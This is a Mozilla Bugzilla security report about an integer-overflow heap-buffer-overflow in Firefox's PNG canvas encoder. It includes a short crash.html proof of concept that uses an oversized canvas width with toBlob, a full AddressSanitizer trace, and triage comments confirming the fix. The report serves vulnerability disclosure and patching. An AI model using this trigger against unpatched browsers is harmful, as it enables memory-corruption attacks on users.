Closed
Bug 1294662
Opened 8 years ago
Closed 8 years ago
heap-buffer-overflow in nsPNGEncoder::AddImageFrame
Categories
(Core :: Graphics: Canvas2D, defect)
Core
Graphics: Canvas2D
Tracking
()
RESOLVED
DUPLICATE
of bug 1294677
Tracking | Status | |
---|---|---|
firefox51 | --- | affected |
People
(Reporter: nils, Assigned: milan)
References
Details
(Keywords: csectype-bounds, sec-critical)
Attachments
(1 file)
204 bytes,
text/html
|
Details |
An integer overflow vulnerability exists in nsPNGEncoder::AddImageFrame which results in a too small allocation resulting in a buffer overflow: nsPNGEncoder.cpp: 282: UniquePtr<uint8_t[]> row = MakeUnique<uint8_t[]>(aWidth * 4); Similar constructs exist in the other encoders as well, even though I wasn't able to trigger a crash. e.g.: http://searchfox.org/mozilla-central/source/image/encoders/bmp/nsBMPEncoder.cpp#191 http://searchfox.org/mozilla-central/source/image/encoders/jpeg/nsJPEGEncoder.cpp#172 The testcase crashes the latest 64-bit ASAN build of Firefox as follows: crash.html: <script> c=document.createElement('canvas'); c.setAttribute('width',1073741831); c.setAttribute('height', 1); //c['mozGetAsFile'](undefined,14); c.toBlob(alert, "image/png"); </script> Both mozGetAsFile and toBlob work. toBlob triggers the crash in a separate thread. ================================================================= ==31309==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300028df3f at pc 0x7f377fc951d1 bp 0x7f3763ffdc70 sp 0x7f3763ffdc68 WRITE of size 1 at 0x60300028df3f thread T34 (Encodin~able #1) #0 0x7f377fc951d0 in ConvertHostARGBRow /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/png/nsPNGEncoder.cpp:640:31 #1 0x7f377fc951d0 in nsPNGEncoder::AddImageFrame(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/png/nsPNGEncoder.cpp:284 #2 0x7f377fc938f9 in nsPNGEncoder::InitFromData(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/png/nsPNGEncoder.cpp:68:8 #3 0x7f377ff4a6bd in mozilla::dom::ImageEncoder::ExtractDataInternal(nsAString_internal const&, nsAString_internal const&, unsigned char*, int, mozilla::gfx::IntSizeTyped<mozilla::gfx::UnknownUnits>, mozilla::layers::Image*, nsICanvasRenderingContextInternal*, mozilla::layers::AsyncCanvasRenderer*, nsIInputStream**, imgIEncoder*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:455:10 #4 0x7f377ffb420b in mozilla::dom::EncodingRunnable::ProcessImageData(unsigned long*, void**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:169:19 #5 0x7f377ffacfd2 in mozilla::dom::EncodingRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:211:19 #6 0x7f377d3bd50f in nsThreadPool::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:227:7 #7 0x7f377d3bdbfc in non-virtual thunk to nsThreadPool::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:154:15 #8 0x7f377d3b66b6 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1068:7 #9 0x7f377d434a9c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10 #10 0x7f377e18990c in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:354:20 #11 0x7f377e0fd1f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3 #12 0x7f377e0fd1f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225 #13 0x7f377e0fd1f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205 #14 0x7f377d3b19d1 in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:463:5 #15 0x7f379627a378 in _pt_root /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:216:5 #16 0x7f37998706f9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76f9) #17 0x7f37988f9b5c in clone /build/glibc-GKVZIf/glibc-2.23/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:109 0x60300028df3f is located 3 bytes to the right of 28-byte region [0x60300028df20,0x60300028df3c) allocated by thread T34 (Encodin~able #1) here: #0 0x4b247b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3 #1 0x4e0bcd in moz_xmalloc /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/memory/mozalloc/mozalloc.cpp:83:17 #2 0x7f377fc94597 in operator new[] /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:205:12 #3 0x7f377fc94597 in MakeUnique<unsigned char []> /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/UniquePtr.h:688 #4 0x7f377fc94597 in nsPNGEncoder::AddImageFrame(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/png/nsPNGEncoder.cpp:282 #5 0x7f377fc938f9 in nsPNGEncoder::InitFromData(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/png/nsPNGEncoder.cpp:68:8 #6 0x7f377ff4a6bd in mozilla::dom::ImageEncoder::ExtractDataInternal(nsAString_internal const&, nsAString_internal const&, unsigned char*, int, mozilla::gfx::IntSizeTyped<mozilla::gfx::UnknownUnits>, mozilla::layers::Image*, nsICanvasRenderingContextInternal*, mozilla::layers::AsyncCanvasRenderer*, nsIInputStream**, imgIEncoder*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:455:10 #7 0x7f377ffb420b in mozilla::dom::EncodingRunnable::ProcessImageData(unsigned long*, void**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:169:19 #8 0x7f377ffacfd2 in mozilla::dom::EncodingRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:211:19 #9 0x7f377d3bd50f in nsThreadPool::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:227:7 #10 0x7f377d3bdbfc in non-virtual thunk to nsThreadPool::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:154:15 #11 0x7f377d3b66b6 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1068:7 #12 0x7f377d434a9c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10 #13 0x7f377e18990c in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:354:20 #14 0x7f377e0fd1f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3 #15 0x7f377e0fd1f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225 #16 0x7f377e0fd1f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205 #17 0x7f377d3b19d1 in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:463:5 #18 0x7f379627a378 in _pt_root /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:216:5 #19 0x7f37998706f9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76f9) Thread T34 (Encodin~able #1) created by T0 (Web Content) here: #0 0x49a839 in __interceptor_pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:238:3 #1 0x7f3796276f3f in _PR_CreateThread /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:457:14 #2 0x7f3796276b4a in PR_CreateThread /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:548:12 #3 0x7f377d3b315b in nsThread::Init() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:634:8 #4 0x7f377d3ba87f in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadManager.cpp:253:17 #5 0x7f377d3bc309 in nsThreadPool::PutEvent(already_AddRefed<nsIRunnable>, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:106:3 #6 0x7f377d3bdedf in nsThreadPool::Dispatch(already_AddRefed<nsIRunnable>, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThreadPool.cpp:276:5 #7 0x7f377ff4c9fc in Dispatch /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/nsIEventTarget.h:37:14 #8 0x7f377ff4c9fc in mozilla::dom::ImageEncoder::ExtractDataAsync(nsAString_internal&, nsAString_internal const&, bool, mozilla::UniquePtr<unsigned char [], mozilla::DefaultDelete<unsigned char []> >, int, mozilla::gfx::IntSizeTyped<mozilla::gfx::UnknownUnits>, mozilla::dom::EncodeCompleteCallback*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/ImageEncoder.cpp:328 #9 0x7f378205b238 in mozilla::dom::CanvasRenderingContextHelper::ToBlob(JSContext*, nsIGlobalObject*, mozilla::dom::EncodeCompleteCallback*, nsAString_internal const&, JS::Handle<JS::Value>, mozilla::ErrorResult&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/canvas/CanvasRenderingContextHelper.cpp:114:9 #10 0x7f378205ab01 in mozilla::dom::CanvasRenderingContextHelper::ToBlob(JSContext*, nsIGlobalObject*, mozilla::dom::FileCallback&, nsAString_internal const&, JS::Handle<JS::Value>, mozilla::ErrorResult&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/canvas/CanvasRenderingContextHelper.cpp:71:3 #11 0x7f3782536fbe in mozilla::dom::HTMLCanvasElement::ToBlob(JSContext*, mozilla::dom::FileCallback&, nsAString_internal const&, JS::Handle<JS::Value>, mozilla::ErrorResult&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/html/HTMLCanvasElement.cpp:770:3 #12 0x7f3781cdcd2a in mozilla::dom::HTMLCanvasElementBinding::toBlob(JSContext*, JS::Handle<JSObject*>, mozilla::dom::HTMLCanvasElement*, JSJitMethodCallArgs const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/HTMLCanvasElementBinding.cpp:355:3 #13 0x7f3781f5bf37 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/bindings/BindingUtils.cpp:2770:13 #14 0x7f3787ed3a9b in CallJSNative /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jscntxtinlines.h:232:15 #15 0x7f3787ed3a9b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:441 #16 0x7f3787eba7b3 in CallFromStack /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:504:12 #17 0x7f3787eba7b3 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:2873 #18 0x7f3787ea0f8e in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:399:12 #19 0x7f3787ed6370 in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:679:15 #20 0x7f3787ed6a9e in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:711:12 #21 0x7f3787a03ece in Evaluate(JSContext*, JS::Handle<JSObject*>, JS::Handle<js::StaticScope*>, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:4434:19 #22 0x7f3787a04a21 in Evaluate /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:4461:12 #23 0x7f3787a04a21 in JS::Evaluate(JSContext*, JS::AutoVectorRooter<JSObject*>&, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:4522 #24 0x7f3780201b4d in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&, JS::Handle<JSObject*>, JS::CompileOptions&, nsJSUtils::EvaluateOptions const&, JS::MutableHandle<JS::Value>, void**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsJSUtils.cpp:206:12 #25 0x7f378020263f in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&, JS::Handle<JSObject*>, JS::CompileOptions&, void**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsJSUtils.cpp:266:10 #26 0x7f378028bba7 in nsScriptLoader::EvaluateScript(nsScriptLoadRequest*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptLoader.cpp:2037:12 #27 0x7f37802889fa in nsScriptLoader::ProcessRequest(nsScriptLoadRequest*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptLoader.cpp:1836:10 #28 0x7f37802722ee in nsScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptLoader.cpp:1574:10 #29 0x7f378026ea82 in nsScriptElement::MaybeProcessScript() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptElement.cpp:141:10 #30 0x7f377f396ed4 in AttemptToExecute /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsIScriptElement.h:222:18 #31 0x7f377f396ed4 in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:664 #32 0x7f377f3956a1 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:488:7 #33 0x7f377f399efb in nsHtml5ExecutorFlusher::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5StreamParser.cpp:128:9 #34 0x7f377d3b66b6 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1068:7 #35 0x7f377d434a9c in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10 #36 0x7f377e1884ef in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:100:21 #37 0x7f377e0fd1f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3 #38 0x7f377e0fd1f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225 #39 0x7f377e0fd1f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205 #40 0x7f3783c0e49f in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156:3 #41 0x7f3785cb6587 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:851:12 #42 0x7f377e0fd1f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:232:3 #43 0x7f377e0fd1f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:225 #44 0x7f377e0fd1f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:205 #45 0x7f3785cb5c23 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:681:7 #46 0x4dfb2b in content_process_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:224:19 #47 0x4dfb2b in main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/nsBrowserApp.cpp:357 #48 0x7f379881382f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/image/encoders/png/nsPNGEncoder.cpp:640:31 in ConvertHostARGBRow Shadow bytes around the buggy address: 0x0c0680049b90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0680049ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0680049bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0680049bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0680049bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c0680049be0: fa fa fa fa 00 00 00[04]fa fa 00 00 00 00 fa fa 0x0c0680049bf0: 00 00 04 fa fa fa fd fd fd fd fa fa fd fd fd fd 0x0c0680049c00: fa fa 00 00 00 00 fa fa fd fd fd fa fa fa 00 00 0x0c0680049c10: 00 06 fa fa 00 00 00 00 fa fa 00 00 00 fa fa fa 0x0c0680049c20: 00 00 00 00 fa fa 00 00 00 04 fa fa 00 00 00 00 0x0c0680049c30: fa fa 00 00 00 04 fa fa 00 00 00 00 fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==31309==ABORTING
I was also able to trigger a similar bug in the BMP encoder. See https://bugzilla.mozilla.org/show_bug.cgi?id=1294677
Updated•8 years ago
|
Group: core-security → gfx-core-security
Updated•8 years ago
|
Keywords: csectype-bounds,
sec-high
Updated•8 years ago
|
Keywords: sec-high → sec-critical
Comment 3•8 years ago
|
||
Assigning Milan since he assigned himself to the BMP one.
Assignee: nobody → milan
Assignee | ||
Comment 4•8 years ago
|
||
(In reply to Daniel Veditz [:dveditz] from comment #3) > Assigning Milan since he assigned himself to the BMP one. Thanks. It's fixed by the same patch as bug 1294677.
Updated•8 years ago
|
Depends on: CVE-2016-5278
Comment 5•8 years ago
|
||
Nils, bug 1294677 is about to land. Once it lands, can you confirm that it fixes this manifestation?
I wasn't able to test this with an ASAN build as the tinderbox mozilla-central ASAN builds seem to be broken for a while now ... However this issue did crash a non ASAN build before the fix and I can confirm that the latest build does not crash anymore.
Flags: needinfo?(nils)
Comment 8•8 years ago
|
||
(In reply to Nils from comment #7) > I wasn't able to test this with an ASAN build as the tinderbox > mozilla-central ASAN builds seem to be broken for a while now ... > They're not "broken." They're no longer maintained. ASAN builds have been made by Task Cluster for a while. Our Release Engineering team changed the process. This was sent out to my team by Decoder: Manual browsing: 1. Go to https://tools.taskcluster.net/index/artifacts/#gecko.v2.mozilla-central.latest.firefox/gecko.v2.mozilla-central.latest.firefox.linux64-asan-opt 2. On the right side, you will see the most recent build (the browser is in "public/build/target.tar.bz2"). Automated downloading: There is a JSON API for accessing the index and the artifacts of a task, so you would have to: 1. Fetch https://index.taskcluster.net/v1/task/gecko.v2.mozilla-central.latest.firefox.linux64-asan-opt 2. Extract the taskId from the response. 3. Fetch https://queue.taskcluster.net/v1/task/<TASKID>/artifacts (replace <TASKID> with the id from the previous response). 4. Extract list of desired files and fetch them by appending them to the previous URL, e.g. the browser will be at: https://queue.taskcluster.net/v1/task/<TASKID>/artifacts/public/build/target.tar.bz2
Flags: needinfo?(nils)
Comment 10•8 years ago
|
||
Nils, I still need to know if this reproduces per comment 5 or if it is fixed.
Flags: needinfo?(nils)
Reporter | ||
Comment 11•8 years ago
|
||
I can confirm that this does not reproduce on a recent ASAN build as well.
Flags: needinfo?(nils)
Updated•8 years ago
|
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Updated•8 years ago
|
Flags: sec-bounty?
Updated•8 years ago
|
Flags: sec-bounty? → sec-bounty-
Updated•5 years ago
|
Group: gfx-core-security
You need to log in
before you can comment on or make changes to this bug.
Description
•